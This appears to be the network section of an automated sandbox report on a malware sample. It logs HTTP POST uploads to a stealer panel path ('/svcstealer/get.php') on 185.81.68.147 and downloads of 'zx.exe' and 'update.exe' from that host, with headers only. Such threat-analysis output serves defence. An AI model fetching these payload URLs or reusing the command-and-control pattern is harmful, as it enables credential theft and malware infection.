Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 185.81.68.147 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
POST
200
http://185.81.68.147/svcstealer/get.php
REQUEST
RESPONSE
BODY
POST /svcstealer/get.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----7d82751e2bc0858
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 14249
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Set-Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:36 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
200
http://185.81.68.147/svcstealer/get.php
REQUEST
RESPONSE
BODY
POST /svcstealer/get.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 34
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:37 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
200
http://185.81.68.147/svcstealer/get.php
REQUEST
RESPONSE
BODY
POST /svcstealer/get.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----7d82751e2bc0858
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 24437
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:37 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
200
http://185.81.68.147/svcstealer/get.php
REQUEST
RESPONSE
BODY
POST /svcstealer/get.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 26
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:38 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:38 GMT
Content-Length: 66
Content-Type: text/html; charset=UTF-8
GET
200
http://185.81.68.147/zx.exe
REQUEST
RESPONSE
BODY
GET /zx.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:38 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 17 Jan 2025 23:37:23 GMT
ETag: "5a4529-62bef647b0719"
Accept-Ranges: bytes
Content-Length: 5915945
Content-Type: application/x-msdownload
GET
200
http://185.81.68.147/update.exe
REQUEST
RESPONSE
BODY
GET /update.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:52 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 17 Jan 2025 23:31:20 GMT
ETag: "be00-62bef4eda5aaa"
Accept-Ranges: bytes
Content-Length: 48640
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts